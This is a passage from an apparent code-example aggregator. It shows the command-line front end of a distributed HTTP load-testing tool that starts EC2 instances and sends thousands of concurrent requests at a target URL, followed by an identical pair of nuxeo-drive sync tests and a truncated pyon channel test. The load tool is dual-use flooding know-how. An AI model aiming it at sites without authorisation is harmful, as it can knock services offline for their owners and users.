                        help="The availability zone to start the instances in (default: us-east-1d).")
    up_group.add_option('-i', '--instance',  metavar="INSTANCE",  nargs=1,
                        action='store', dest='instance', type='string', default='ami-ff17fb96',
                        help="The instance-id to use for each server from (default: ami-ff17fb96).")
    up_group.add_option('-t', '--type',  metavar="TYPE",  nargs=1,
                        action='store', dest='type', type='string', default='t1.micro',
                        help="The instance-type to use for each server (default: t1.micro).")
    up_group.add_option('-l', '--login',  metavar="LOGIN",  nargs=1,
                        action='store', dest='login', type='string', default='newsapps',
                        help="The ssh username name to use to connect to the new servers (default: newsapps).")
    up_group.add_option('-v', '--subnet',  metavar="SUBNET",  nargs=1,
                        action='store', dest='subnet', type='string', default=None,
                        help="The vpc subnet id in which the instances should be launched. (default: None).")
    up_group.add_option('-b', '--bid', metavar="BID", nargs=1,
                        action='store', dest='bid', type='float', default=None,
                        help="The maximum bid price per spot instance (default: None).")

    parser.add_option_group(up_group)

    attack_group = OptionGroup(parser, "attack",
                               """Beginning an attack requires only that you specify the -u option with the URL you wish to target.""")

    # Required
    attack_group.add_option('-u', '--url', metavar="URL", nargs=1,
                            action='store', dest='url', type='string',
                            help="URL of the target to attack.")
    attack_group.add_option('-K', '--keepalive', metavar="KEEP_ALIVE", nargs=0,
                            action='store', dest='keep_alive', type='string', default=False,
                            help="Keep-Alive connection.")
    attack_group.add_option('-p', '--post-file',  metavar="POST_FILE",  nargs=1,
                            action='store', dest='post_file', type='string', default=False,
                            help="The POST file to deliver with the bee's payload.")
    attack_group.add_option('-m', '--mime-type',  metavar="MIME_TYPE",  nargs=1,
                            action='store', dest='mime_type', type='string', default='text/plain',
                            help="The MIME type to send with the request.")
    attack_group.add_option('-n', '--number', metavar="NUMBER", nargs=1,
                            action='store', dest='number', type='int', default=1000,
                            help="The number of total connections to make to the target (default: 1000).")
    attack_group.add_option('-C', '--cookies', metavar="COOKIES", nargs=1, action='store', dest='cookies',
                            type='string', default='',
                            help='Cookies to send during http requests. The cookies should be passed using standard cookie formatting, separated by semi-colons and assigned with equals signs.')
    attack_group.add_option('-c', '--concurrent', metavar="CONCURRENT", nargs=1,
                            action='store', dest='concurrent', type='int', default=100,
                            help="The number of concurrent connections to make to the target (default: 100).")
    attack_group.add_option('-H', '--headers', metavar="HEADERS", nargs=1,
                            action='store', dest='headers', type='string', default='',
                            help="HTTP headers to send to the target to attack. Multiple headers should be separated by semi-colons, e.g header1:value1;header2:value2")
    attack_group.add_option('-e', '--csv', metavar="FILENAME", nargs=1,
                            action='store', dest='csv_filename', type='string', default='',
                            help="Store the distribution of results in a csv file for all completed bees (default: '').")
    attack_group.add_option('-P', '--contenttype', metavar="CONTENTTYPE", nargs=1,
                            action='store', dest='contenttype', type='string', default='text/plain',
                            help="ContentType header to send to the target of the attack.")
    attack_group.add_option('-I', '--sting', metavar="sting", nargs=1,
                            action='store', dest='sting', type='int', default=1,
                            help="The flag to sting (ping to cache) url before attack (default: 1). 0: no sting, 1: sting sequentially, 2: sting in parallel")
    attack_group.add_option('-S', '--seconds', metavar="SECONDS", nargs=1,
                            action='store', dest='seconds', type='int', default=60,
                            help= "hurl only: The number of total seconds to attack the target (default: 60).")
    attack_group.add_option('-X', '--verb', metavar="VERB", nargs=1,
                            action='store', dest='verb', type='string', default='',
                            help= "hurl only: Request command -HTTP verb to use -GET/PUT/etc. Default GET")
    attack_group.add_option('-M', '--rate', metavar="RATE", nargs=1,
                            action='store', dest='rate', type='int',
                            help= "hurl only: Max Request Rate.")
    attack_group.add_option('-a', '--threads', metavar="THREADS", nargs=1,
                            action='store', dest='threads', type='int', default=1,
                            help= "hurl only: Number of parallel threads. Default: 1")
    attack_group.add_option('-f', '--fetches', metavar="FETCHES", nargs=1,
                            action='store', dest='fetches', type='int', 
                            help= "hurl only: Num fetches per instance.")
    attack_group.add_option('-d', '--timeout', metavar="TIMEOUT", nargs=1,
                            action='store', dest='timeout', type='int',
                            help= "hurl only: Timeout (seconds).")
    attack_group.add_option('-E', '--send_buffer', metavar="SEND_BUFFER", nargs=1,
                            action='store', dest='send_buffer', type='int',
                            help= "hurl only: Socket send buffer size.")
    attack_group.add_option('-F', '--recv_buffer', metavar="RECV_BUFFER", nargs=1,
                            action='store', dest='recv_buffer', type='int',
                            help= "hurl only: Socket receive buffer size.")
    # Optional
    attack_group.add_option('-T', '--tpr', metavar='TPR', nargs=1, action='store', dest='tpr', default=None, type='float',
                            help='The upper bounds for time per request. If this option is passed and the target is below the value a 1 will be returned with the report details (default: None).')
    attack_group.add_option('-R', '--rps', metavar='RPS', nargs=1, action='store', dest='rps', default=None, type='float',
                            help='The lower bounds for request per second. If this option is passed and the target is above the value a 1 will be returned with the report details (default: None).')
    attack_group.add_option('-A', '--basic_auth', metavar='basic_auth', nargs=1, action='store', dest='basic_auth', default='', type='string',
                            help='BASIC authentication credentials, format auth-username:password (default: None).')
    attack_group.add_option('-j', '--hurl', metavar="HURL_COMMANDS",
                            action='store_true', dest='hurl',
                            help="use hurl")
    attack_group.add_option('-o', '--long_output', metavar="LONG_OUTPUT",
                            action='store_true', dest='long_output',
                            help="display hurl output")
    attack_group.add_option('-L', '--responses_per', metavar="RESPONSE_PER",
                            action='store_true', dest='responses_per',
                            help="hurl only: Display http(s) response codes per interval instead of request statistics")


    parser.add_option_group(attack_group)

    (options, args) = parser.parse_args()

    if len(args) <= 0:
        parser.error('Please enter a command.')

    command = args[0]
    #set time for in between threads
    delay = 0.2

    if command == 'up':
        if not options.key:
            parser.error('To spin up new instances you need to specify a key-pair name with -k')

        if options.group == 'default':
            print('New bees will use the "default" EC2 security group. Please note that port 22 (SSH) is not normally open on this group. You will need to use to the EC2 tools to open it before you will be able to attack.')
        zone_len = options.zone.split(',')
        if len(zone_len) > 1:
            if len(options.instance.split(',')) != len(zone_len):
                print("Your instance count does not match zone count")
                sys.exit(1)
            else:
                ami_list = [a for a in options.instance.split(',')]
                zone_list = [z for z in zone_len]
                # for each ami and zone set zone and instance
                for tup_val in zip(ami_list, zone_list):
                    options.instance, options.zone = tup_val
                    threading.Thread(target=bees.up, args=(options.servers, options.group,
                                                            options.zone, options.instance,
                                                            options.type,options.login,
                                                            options.key, options.subnet,
                                                            options.bid)).start()
                    #time allowed between threads
                    time.sleep(delay)
        else:
            bees.up(options.servers, options.group, options.zone, options.instance, options.type, options.login, options.key, options.subnet, options.bid)

    elif command == 'attack':
        if not options.url:
            parser.error('To run an attack you need to specify a url with -u')

        regions_list = []
        for region in bees._get_existing_regions():
                regions_list.append(region)

        # urlparse needs a scheme in the url. ab doesn't, so add one just for the sake of parsing.
        # urlparse('google.com').path == 'google.com' and urlparse('google.com').netloc == '' -> True
        parsed = urlparse(options.url) if '://' in options.url else urlparse('http://'+options.url)
        if parsed.path == '':
            options.url += '/'
        additional_options = dict(
            cookies=options.cookies,
            headers=options.headers,
            post_file=options.post_file,
            keep_alive=options.keep_alive,
            mime_type=options.mime_type,
            csv_filename=options.csv_filename,
            tpr=options.tpr,
            rps=options.rps,
            basic_auth=options.basic_auth,
            contenttype=options.contenttype,
            sting=options.sting,
            hurl=options.hurl,
            seconds=options.seconds,
            rate=options.rate,
            long_output=options.long_output,
            responses_per=options.responses_per,
            verb=options.verb,
            threads=options.threads,
            fetches=options.fetches,
            timeout=options.timeout,
            send_buffer=options.send_buffer,
            recv_buffer=options.recv_buffer
        )
        if options.hurl:
            for region in regions_list:
                additional_options['zone'] = region
                threading.Thread(target=bees.hurl_attack, args=(options.url, options.number, options.concurrent),
                    kwargs=additional_options).start()
                #time allowed between threads
                time.sleep(delay)
        else:
            for region in regions_list:
                additional_options['zone'] = region
                threading.Thread(target=bees.attack, args=(options.url, options.number,
                    options.concurrent), kwargs=additional_options).start()
                #time allowed between threads
                time.sleep(delay)

    elif command == 'down':
        bees.down()
    elif command == 'report':
        bees.report()

Example 48

Project: nuxeo-drive
Source File: test_remote_deletion.py
View license
    def test_synchronize_remote_deletion_local_modification(self):
        raise SkipTest("Behavior has changed with trash feature - remove this test ?")
        """Test remote deletion with concurrent local modification

        Use cases:
          - Remotely delete a regular folder and make some
            local changes concurrently.
              => Only locally modified content should be kept
                 and should be marked as 'unsynchronized',
                 other content should be deleted.
          - Remotely restore folder from the trash.
              => Remote documents should be merged with
                 locally modified content which should be unmarked
                 as 'unsynchronized'.
          - Remotely delete a file and locally update its content concurrently.
              => File should be kept locally and be marked as 'unsynchronized'.
          - Remotely restore file from the trash.
              => Remote file should be merged with locally modified file with
                 a conflict detection and both files should be marked
                 as 'synchronized'.
          - Remotely delete a file and locally rename it concurrently.
              => File should be kept locally and be marked as 'synchronized'.
          - Remotely restore file from the trash.
              => Remote file should be merged with locally renamed file and
                 both files should be marked as 'synchronized'.

        See TestIntegrationSecurityUpdates
                .test_synchronize_denying_read_access_local_modification
        as the same uses cases are tested.

        Note that we use the .odt extension for test files to make sure
        that they are created as File and not Note documents on the server
        when synchronized upstream, as the current implementation of
        RemoteDocumentClient is File oriented.
        """
        # Bind the server and root workspace
        self.engine_1.start()
        # Get local and remote clients
        local = self.local_client_1
        remote = self.remote_document_client_2

        # Create documents in the remote root workspace
        # then synchronize
        remote.make_folder('/', 'Test folder')
        remote.make_file('/Test folder', 'joe.odt', 'Some content')
        remote.make_file('/Test folder', 'jack.odt', 'Some content')
        remote.make_folder('/Test folder', 'Sub folder 1')
        remote.make_file('/Test folder/Sub folder 1', 'sub file 1.txt',
                         'Content')
        self.wait_sync(wait_for_async=True)
        self.assertTrue(local.exists('/Test folder'))
        self.assertTrue(local.exists('/Test folder/joe.odt'))
        self.assertTrue(local.exists('/Test folder/jack.odt'))
        self.assertTrue(local.exists('/Test folder/Sub folder 1'))
        self.assertTrue(local.exists(
                                '/Test folder/Sub folder 1/sub file 1.txt'))

        # Delete remote folder and make some local changes
        # concurrently then synchronize
        remote.delete('/Test folder')
        time.sleep(OS_STAT_MTIME_RESOLUTION)
        # Create new file
        local.make_file('/Test folder', 'new.odt', "New content")
        # Create new folder with files
        local.make_folder('/Test folder', 'Sub folder 2')
        local.make_file('/Test folder/Sub folder 2', 'sub file 2.txt',
                        'Other content')
        # Update file
        local.update_content('/Test folder/joe.odt', 'Some updated content')
        self.wait_sync(wait_for_async=True)
        # Only locally modified content should exist
        # and should be marked as 'unsynchronized', other content should
        # have been deleted
        # Local check
        self.assertTrue(local.exists('/Test folder'))
        self.assertTrue(local.exists('/Test folder/joe.odt'))
        self.assertEquals(local.get_content('/Test folder/joe.odt'),
                          'Some updated content')
        self.assertTrue(local.exists('/Test folder/new.odt'))
        self.assertTrue(local.exists('/Test folder/Sub folder 2'))
        self.assertTrue(local.exists(
                                '/Test folder/Sub folder 2/sub file 2.txt'))

        self.assertFalse(local.exists('/Test folder/jack.odt'))
        self.assertFalse(local.exists('/Test folder/Sub folder 1'))
        self.assertFalse(local.exists(
                                '/Test folder/Sub folder 1/sub file 1.txt'))
        # State check
        self._check_pair_state('/Test folder', 'unsynchronized')
        self._check_pair_state('/Test folder/joe.odt',
                               'unsynchronized')
        self._check_pair_state('/Test folder/new.odt',
                               'unsynchronized')
        self._check_pair_state('/Test folder/Sub folder 2',
                               'unsynchronized')
        self._check_pair_state('/Test folder/Sub folder 2/sub file 2.txt',
                               'unsynchronized')
        # Remote check
        self.assertFalse(remote.exists('/Test folder'))

        # Restore remote folder and its children from trash then synchronize
        remote.undelete('/Test folder')
        remote.undelete('/Test folder/joe.odt')
        remote.undelete('/Test folder/jack.odt')
        remote.undelete('/Test folder/Sub folder 1')
        remote.undelete('/Test folder/Sub folder 1/sub file 1.txt')
        self.wait_sync(wait_for_async=True)
        # Remotely restored documents should be merged with
        # locally modified content which should be unmarked
        # as 'unsynchronized' and therefore synchronized upstream
        # Local check
        self.assertTrue(local.exists('/Test folder'))
        children_info = local.get_children_info('/Test folder')
        self.assertEquals(len(children_info), 6)
        for info in children_info:
            if info.name == 'joe.odt':
                remote_version = info
            elif info.name.startswith('joe (') and info.name.endswith(').odt'):
                local_version = info
        self.assertTrue(remote_version is not None)
        self.assertTrue(local_version is not None)
        self.assertTrue(local.exists(remote_version.path))
        self.assertEquals(local.get_content(remote_version.path),
                          'Some content')
        self.assertTrue(local.exists(local_version.path))
        self.assertEquals(local.get_content(local_version.path),
                          'Some updated content')
        self.assertTrue(local.exists('/Test folder/jack.odt'))
        self.assertTrue(local.exists('/Test folder/new.odt'))
        self.assertTrue(local.exists('/Test folder/Sub folder 1'))
        self.assertTrue(local.exists(
                                '/Test folder/Sub folder 1/sub file 1.txt'))
        self.assertTrue(local.exists('/Test folder/Sub folder 2'))
        self.assertTrue(local.exists(
                                '/Test folder/Sub folder 2/sub file 2.txt'))
        # State check
        self._check_pair_state('/Test folder', 'synchronized')
        self._check_pair_state('/Test folder/joe.odt',
                               'synchronized')
        self._check_pair_state('/Test folder/new.odt',
                               'synchronized')
        self._check_pair_state('/Test folder/Sub folder 2',
                               'synchronized')
        self._check_pair_state('/Test folder/Sub folder 2/sub file 2.txt',
                               'synchronized')
        # Remote check
        self.assertTrue(remote.exists('/Test folder'))
        test_folder_uid = remote.get_info('/Test folder').uid
        children_info = remote.get_children_info(test_folder_uid)
        self.assertEquals(len(children_info), 6)
        for info in children_info:
            if info.name == 'joe.odt':
                remote_version = info
            elif info.name.startswith('joe (') and info.name.endswith(').odt'):
                local_version = info
        self.assertTrue(remote_version is not None)
        self.assertTrue(local_version is not None)
        remote_version_ref_length = (len(remote_version.path)
                                     - len(TEST_WORKSPACE_PATH))
        remote_version_ref = remote_version.path[-remote_version_ref_length:]
        self.assertTrue(remote.exists(remote_version_ref))
        self.assertEquals(remote.get_content(remote_version_ref),
                          'Some content')
        local_version_ref_length = (len(local_version.path)
                                     - len(TEST_WORKSPACE_PATH))
        local_version_ref = local_version.path[-local_version_ref_length:]
        self.assertTrue(remote.exists(local_version_ref))
        self.assertEquals(remote.get_content(local_version_ref),
                          'Some updated content')
        self.assertTrue(remote.exists('/Test folder/jack.odt'))
        self.assertTrue(remote.exists('/Test folder/new.odt'))
        self.assertTrue(remote.exists('/Test folder/Sub folder 1'))
        self.assertTrue(remote.exists(
                                '/Test folder/Sub folder 1/sub file 1.txt'))
        self.assertTrue(remote.exists('/Test folder/Sub folder 2'))
        self.assertTrue(remote.exists(
                    '/Test folder/Sub folder 2/sub file 2.txt'))

        # Delete remote file and update its local content
        # concurrently then synchronize
        remote.delete('/Test folder/jack.odt')
        time.sleep(OS_STAT_MTIME_RESOLUTION)
        local.update_content('/Test folder/jack.odt', 'Some updated content')
        self.wait_sync(wait_for_async=True)
        # File should be kept locally and be marked as 'unsynchronized'.
        # Local check
        self.assertTrue(local.exists('/Test folder/jack.odt'))
        self.assertEquals(local.get_content('/Test folder/jack.odt'),
                          'Some updated content')
        # Remote check
        self.assertFalse(remote.exists('/Test folder/jack.odt'))
        # State check
        self._check_pair_state('/Test folder', 'synchronized')
        self._check_pair_state('/Test folder/jack.odt', 'unsynchronized')

        # Remotely restore file from the trash then synchronize
        remote.undelete('/Test folder/jack.odt')
        self.wait_sync(wait_for_async=True)
        # Remotely restored file should be merged with locally modified file
        # with a conflict detection and both files should be marked
        # as 'synchronized'
        # Local check
        children_info = local.get_children_info('/Test folder')
        for info in children_info:
            if info.name == 'jack.odt':
                remote_version = info
            elif (info.name.startswith('jack (')
                  and info.name.endswith(').odt')):
                local_version = info
        self.assertTrue(remote_version is not None)
        self.assertTrue(local_version is not None)
        self.assertTrue(local.exists(remote_version.path))
        self.assertEquals(local.get_content(remote_version.path),
                          'Some content')
        self.assertTrue(local.exists(local_version.path))
        self.assertEquals(local.get_content(local_version.path),
                          'Some updated content')
        # Remote check
        self.assertTrue(remote.exists(remote_version.path))
        self.assertEquals(remote.get_content(remote_version.path),
                          'Some content')
        local_version_path = self._truncate_remote_path(local_version.path)
        self.assertTrue(remote.exists(local_version_path))
        self.assertEquals(remote.get_content(local_version_path),
                          'Some updated content')
        # State check
        self._check_pair_state(remote_version.path, 'synchronized')
        self._check_pair_state(local_version.path, 'synchronized')

        # Delete remote file and rename it locally
        # concurrently then synchronize
        remote.delete('/Test folder/jack.odt')
        time.sleep(OS_STAT_MTIME_RESOLUTION)
        local.rename('/Test folder/jack.odt', 'jack renamed.odt')
        self.wait_sync(wait_for_async=True)
        # File should be kept locally and be marked as 'synchronized'
        # Local check
        self.assertFalse(local.exists('/Test folder/jack.odt'))
        self.assertTrue(local.exists('/Test folder/jack renamed.odt'))
        self.assertEquals(local.get_content('/Test folder/jack renamed.odt'),
                          'Some content')
        # Remote check
        self.assertFalse(remote.exists('/Test folder/jack.odt'))
        # State check
        self._check_pair_state('/Test folder', 'synchronized')
        self._check_pair_state('/Test folder/jack renamed.odt', 'synchronized')

        # Remotely restore file from the trash then synchronize
        remote.undelete('/Test folder/jack.odt')
        self.wait_sync(wait_for_async=True)
        # Remotely restored file should be merged with locally renamed file
        # and both files should be marked as 'synchronized'
        # Local check
        self.assertTrue(local.exists('/Test folder/jack.odt'))
        self.assertEquals(local.get_content('/Test folder/jack.odt'),
                          'Some content')
        self.assertTrue(local.exists('/Test folder/jack renamed.odt'))
        self.assertEquals(local.get_content('/Test folder/jack renamed.odt'),
                          'Some content')
        # Remote check
        self.assertTrue(remote.exists('/Test folder/jack.odt'))
        self.assertEquals(remote.get_content('/Test folder/jack.odt'),
                          'Some content')
        self.assertTrue(remote.exists('/Test folder/jack renamed.odt'))
        self.assertEquals(remote.get_content('/Test folder/jack renamed.odt'),
                          'Some content')
        # State check
        self._check_pair_state('/Test folder/jack.odt', 'synchronized')
        self._check_pair_state('/Test folder/jack renamed.odt', 'synchronized')

Example 49

Project: nuxeo-drive
Source File: test_remote_deletion.py
View license
    def test_synchronize_remote_deletion_local_modification(self):
        raise SkipTest("Behavior has changed with trash feature - remove this test ?")
        """Test remote deletion with concurrent local modification

        Use cases:
          - Remotely delete a regular folder and make some
            local changes concurrently.
              => Only locally modified content should be kept
                 and should be marked as 'unsynchronized',
                 other content should be deleted.
          - Remotely restore folder from the trash.
              => Remote documents should be merged with
                 locally modified content which should be unmarked
                 as 'unsynchronized'.
          - Remotely delete a file and locally update its content concurrently.
              => File should be kept locally and be marked as 'unsynchronized'.
          - Remotely restore file from the trash.
              => Remote file should be merged with locally modified file with
                 a conflict detection and both files should be marked
                 as 'synchronized'.
          - Remotely delete a file and locally rename it concurrently.
              => File should be kept locally and be marked as 'synchronized'.
          - Remotely restore file from the trash.
              => Remote file should be merged with locally renamed file and
                 both files should be marked as 'synchronized'.

        See TestIntegrationSecurityUpdates
                .test_synchronize_denying_read_access_local_modification
        as the same uses cases are tested.

        Note that we use the .odt extension for test files to make sure
        that they are created as File and not Note documents on the server
        when synchronized upstream, as the current implementation of
        RemoteDocumentClient is File oriented.
        """
        # Bind the server and root workspace
        self.engine_1.start()
        # Get local and remote clients
        local = self.local_client_1
        remote = self.remote_document_client_2

        # Create documents in the remote root workspace
        # then synchronize
        remote.make_folder('/', 'Test folder')
        remote.make_file('/Test folder', 'joe.odt', 'Some content')
        remote.make_file('/Test folder', 'jack.odt', 'Some content')
        remote.make_folder('/Test folder', 'Sub folder 1')
        remote.make_file('/Test folder/Sub folder 1', 'sub file 1.txt',
                         'Content')
        self.wait_sync(wait_for_async=True)
        self.assertTrue(local.exists('/Test folder'))
        self.assertTrue(local.exists('/Test folder/joe.odt'))
        self.assertTrue(local.exists('/Test folder/jack.odt'))
        self.assertTrue(local.exists('/Test folder/Sub folder 1'))
        self.assertTrue(local.exists(
                                '/Test folder/Sub folder 1/sub file 1.txt'))

        # Delete remote folder and make some local changes
        # concurrently then synchronize
        remote.delete('/Test folder')
        time.sleep(OS_STAT_MTIME_RESOLUTION)
        # Create new file
        local.make_file('/Test folder', 'new.odt', "New content")
        # Create new folder with files
        local.make_folder('/Test folder', 'Sub folder 2')
        local.make_file('/Test folder/Sub folder 2', 'sub file 2.txt',
                        'Other content')
        # Update file
        local.update_content('/Test folder/joe.odt', 'Some updated content')
        self.wait_sync(wait_for_async=True)
        # Only locally modified content should exist
        # and should be marked as 'unsynchronized', other content should
        # have been deleted
        # Local check
        self.assertTrue(local.exists('/Test folder'))
        self.assertTrue(local.exists('/Test folder/joe.odt'))
        self.assertEquals(local.get_content('/Test folder/joe.odt'),
                          'Some updated content')
        self.assertTrue(local.exists('/Test folder/new.odt'))
        self.assertTrue(local.exists('/Test folder/Sub folder 2'))
        self.assertTrue(local.exists(
                                '/Test folder/Sub folder 2/sub file 2.txt'))

        self.assertFalse(local.exists('/Test folder/jack.odt'))
        self.assertFalse(local.exists('/Test folder/Sub folder 1'))
        self.assertFalse(local.exists(
                                '/Test folder/Sub folder 1/sub file 1.txt'))
        # State check
        self._check_pair_state('/Test folder', 'unsynchronized')
        self._check_pair_state('/Test folder/joe.odt',
                               'unsynchronized')
        self._check_pair_state('/Test folder/new.odt',
                               'unsynchronized')
        self._check_pair_state('/Test folder/Sub folder 2',
                               'unsynchronized')
        self._check_pair_state('/Test folder/Sub folder 2/sub file 2.txt',
                               'unsynchronized')
        # Remote check
        self.assertFalse(remote.exists('/Test folder'))

        # Restore remote folder and its children from trash then synchronize
        remote.undelete('/Test folder')
        remote.undelete('/Test folder/joe.odt')
        remote.undelete('/Test folder/jack.odt')
        remote.undelete('/Test folder/Sub folder 1')
        remote.undelete('/Test folder/Sub folder 1/sub file 1.txt')
        self.wait_sync(wait_for_async=True)
        # Remotely restored documents should be merged with
        # locally modified content which should be unmarked
        # as 'unsynchronized' and therefore synchronized upstream
        # Local check
        self.assertTrue(local.exists('/Test folder'))
        children_info = local.get_children_info('/Test folder')
        self.assertEquals(len(children_info), 6)
        for info in children_info:
            if info.name == 'joe.odt':
                remote_version = info
            elif info.name.startswith('joe (') and info.name.endswith(').odt'):
                local_version = info
        self.assertTrue(remote_version is not None)
        self.assertTrue(local_version is not None)
        self.assertTrue(local.exists(remote_version.path))
        self.assertEquals(local.get_content(remote_version.path),
                          'Some content')
        self.assertTrue(local.exists(local_version.path))
        self.assertEquals(local.get_content(local_version.path),
                          'Some updated content')
        self.assertTrue(local.exists('/Test folder/jack.odt'))
        self.assertTrue(local.exists('/Test folder/new.odt'))
        self.assertTrue(local.exists('/Test folder/Sub folder 1'))
        self.assertTrue(local.exists(
                                '/Test folder/Sub folder 1/sub file 1.txt'))
        self.assertTrue(local.exists('/Test folder/Sub folder 2'))
        self.assertTrue(local.exists(
                                '/Test folder/Sub folder 2/sub file 2.txt'))
        # State check
        self._check_pair_state('/Test folder', 'synchronized')
        self._check_pair_state('/Test folder/joe.odt',
                               'synchronized')
        self._check_pair_state('/Test folder/new.odt',
                               'synchronized')
        self._check_pair_state('/Test folder/Sub folder 2',
                               'synchronized')
        self._check_pair_state('/Test folder/Sub folder 2/sub file 2.txt',
                               'synchronized')
        # Remote check
        self.assertTrue(remote.exists('/Test folder'))
        test_folder_uid = remote.get_info('/Test folder').uid
        children_info = remote.get_children_info(test_folder_uid)
        self.assertEquals(len(children_info), 6)
        for info in children_info:
            if info.name == 'joe.odt':
                remote_version = info
            elif info.name.startswith('joe (') and info.name.endswith(').odt'):
                local_version = info
        self.assertTrue(remote_version is not None)
        self.assertTrue(local_version is not None)
        remote_version_ref_length = (len(remote_version.path)
                                     - len(TEST_WORKSPACE_PATH))
        remote_version_ref = remote_version.path[-remote_version_ref_length:]
        self.assertTrue(remote.exists(remote_version_ref))
        self.assertEquals(remote.get_content(remote_version_ref),
                          'Some content')
        local_version_ref_length = (len(local_version.path)
                                     - len(TEST_WORKSPACE_PATH))
        local_version_ref = local_version.path[-local_version_ref_length:]
        self.assertTrue(remote.exists(local_version_ref))
        self.assertEquals(remote.get_content(local_version_ref),
                          'Some updated content')
        self.assertTrue(remote.exists('/Test folder/jack.odt'))
        self.assertTrue(remote.exists('/Test folder/new.odt'))
        self.assertTrue(remote.exists('/Test folder/Sub folder 1'))
        self.assertTrue(remote.exists(
                                '/Test folder/Sub folder 1/sub file 1.txt'))
        self.assertTrue(remote.exists('/Test folder/Sub folder 2'))
        self.assertTrue(remote.exists(
                    '/Test folder/Sub folder 2/sub file 2.txt'))

        # Delete remote file and update its local content
        # concurrently then synchronize
        remote.delete('/Test folder/jack.odt')
        time.sleep(OS_STAT_MTIME_RESOLUTION)
        local.update_content('/Test folder/jack.odt', 'Some updated content')
        self.wait_sync(wait_for_async=True)
        # File should be kept locally and be marked as 'unsynchronized'.
        # Local check
        self.assertTrue(local.exists('/Test folder/jack.odt'))
        self.assertEquals(local.get_content('/Test folder/jack.odt'),
                          'Some updated content')
        # Remote check
        self.assertFalse(remote.exists('/Test folder/jack.odt'))
        # State check
        self._check_pair_state('/Test folder', 'synchronized')
        self._check_pair_state('/Test folder/jack.odt', 'unsynchronized')

        # Remotely restore file from the trash then synchronize
        remote.undelete('/Test folder/jack.odt')
        self.wait_sync(wait_for_async=True)
        # Remotely restored file should be merged with locally modified file
        # with a conflict detection and both files should be marked
        # as 'synchronized'
        # Local check
        children_info = local.get_children_info('/Test folder')
        for info in children_info:
            if info.name == 'jack.odt':
                remote_version = info
            elif (info.name.startswith('jack (')
                  and info.name.endswith(').odt')):
                local_version = info
        self.assertTrue(remote_version is not None)
        self.assertTrue(local_version is not None)
        self.assertTrue(local.exists(remote_version.path))
        self.assertEquals(local.get_content(remote_version.path),
                          'Some content')
        self.assertTrue(local.exists(local_version.path))
        self.assertEquals(local.get_content(local_version.path),
                          'Some updated content')
        # Remote check
        self.assertTrue(remote.exists(remote_version.path))
        self.assertEquals(remote.get_content(remote_version.path),
                          'Some content')
        local_version_path = self._truncate_remote_path(local_version.path)
        self.assertTrue(remote.exists(local_version_path))
        self.assertEquals(remote.get_content(local_version_path),
                          'Some updated content')
        # State check
        self._check_pair_state(remote_version.path, 'synchronized')
        self._check_pair_state(local_version.path, 'synchronized')

        # Delete remote file and rename it locally
        # concurrently then synchronize
        remote.delete('/Test folder/jack.odt')
        time.sleep(OS_STAT_MTIME_RESOLUTION)
        local.rename('/Test folder/jack.odt', 'jack renamed.odt')
        self.wait_sync(wait_for_async=True)
        # File should be kept locally and be marked as 'synchronized'
        # Local check
        self.assertFalse(local.exists('/Test folder/jack.odt'))
        self.assertTrue(local.exists('/Test folder/jack renamed.odt'))
        self.assertEquals(local.get_content('/Test folder/jack renamed.odt'),
                          'Some content')
        # Remote check
        self.assertFalse(remote.exists('/Test folder/jack.odt'))
        # State check
        self._check_pair_state('/Test folder', 'synchronized')
        self._check_pair_state('/Test folder/jack renamed.odt', 'synchronized')

        # Remotely restore file from the trash then synchronize
        remote.undelete('/Test folder/jack.odt')
        self.wait_sync(wait_for_async=True)
        # Remotely restored file should be merged with locally renamed file
        # and both files should be marked as 'synchronized'
        # Local check
        self.assertTrue(local.exists('/Test folder/jack.odt'))
        self.assertEquals(local.get_content('/Test folder/jack.odt'),
                          'Some content')
        self.assertTrue(local.exists('/Test folder/jack renamed.odt'))
        self.assertEquals(local.get_content('/Test folder/jack renamed.odt'),
                          'Some content')
        # Remote check
        self.assertTrue(remote.exists('/Test folder/jack.odt'))
        self.assertEquals(remote.get_content('/Test folder/jack.odt'),
                          'Some content')
        self.assertTrue(remote.exists('/Test folder/jack renamed.odt'))
        self.assertEquals(remote.get_content('/Test folder/jack renamed.odt'),
                          'Some content')
        # State check
        self._check_pair_state('/Test folder/jack.odt', 'synchronized')
        self._check_pair_state('/Test folder/jack renamed.odt', 'synchronized')

Example 50

Project: pyon
Source File: test_channel.py
View license
    def test_consume_one_message_at_a_time(self):
        # end to end test for CIDEVCOI-547 requirements
        #    - Process P1 is producing one message every 5 seconds
        #    - Process P2 is producing one other message every 3 seconds
        #    - Process S creates a auto-delete=False queue without a consumer and without a binding
        #    - Process S binds this queue through a pyon.net or container API call to the topic of process P1
        #    - Process S waits a bit
        #    - Process S checks the number of messages in the queue
        #    - Process S creates a consumer, takes one message off the queue (non-blocking) and destroys the consumer
        #    - Process S waits a bit (let messages accumulate)
        #    - Process S creates a consumer, takes a message off and repeates it until no messges are left (without ever blocking) and destroys the consumer
        #    - Process S waits a bit (let messages accumulate)
        #    - Process S creates a consumer, takes a message off and repeates it until no messges are left (without ever blocking). Then requeues the last message and destroys the consumer
        #    - Process S creates a consumer, takes one message off the queue (non-blocking) and destroys the consumer.
        #    - Process S sends prior message to its queue (note: may be tricky without a subscription to yourself)
        #    - Process S changes the binding of queue to P1 and P2
        #    - Process S removes all bindings of queue
        #    - Process S deletes the queue
        #    - Process S exists without any residual resources in the broker
        #    - Process P1 and P1 get terminated without any residual resources in the broker
        #
        #    * Show this works with the ACK or no-ACK mode
        #    * Do the above with semi-abstracted calles (some nicer boilerplate)

        def every_five():
            p = self.container.node.channel(PublisherChannel)
            p._send_name = NameTrio(bootstrap.get_sys_name(), 'routed.5')
            counter = 0

            while not self.publish_five.wait(timeout=5):
                p.send('5,' + str(counter))
                counter+=1

        def every_three():
            p = self.container.node.channel(PublisherChannel)
            p._send_name = NameTrio(bootstrap.get_sys_name(), 'routed.3')
            counter = 0

            while not self.publish_three.wait(timeout=3):
                p.send('3,' + str(counter))
                counter+=1

        self.publish_five = Event()
        self.publish_three = Event()
        self.five_events = Queue()
        self.three_events = Queue()

        gl_every_five = spawn(every_five)
        gl_every_three = spawn(every_three)

        def listen(lch):
            """
            The purpose of the this listen method is to trigger waits in code below.
            By setting up a listener that subscribes to both 3 and 5, and putting received
            messages into the appropriate gevent-queues client side, we can assume that
            the channel we're actually testing with get_stats etc has had the message delivered
            too.
            """
            lch._queue_auto_delete = False
            lch.setup_listener(NameTrio(bootstrap.get_sys_name(), 'alternate_listener'), 'routed.3')
            lch._bind('routed.5')
            lch.start_consume()

            while True:
                try:
                    newchan = lch.accept()
                    m, h, d = newchan.recv()
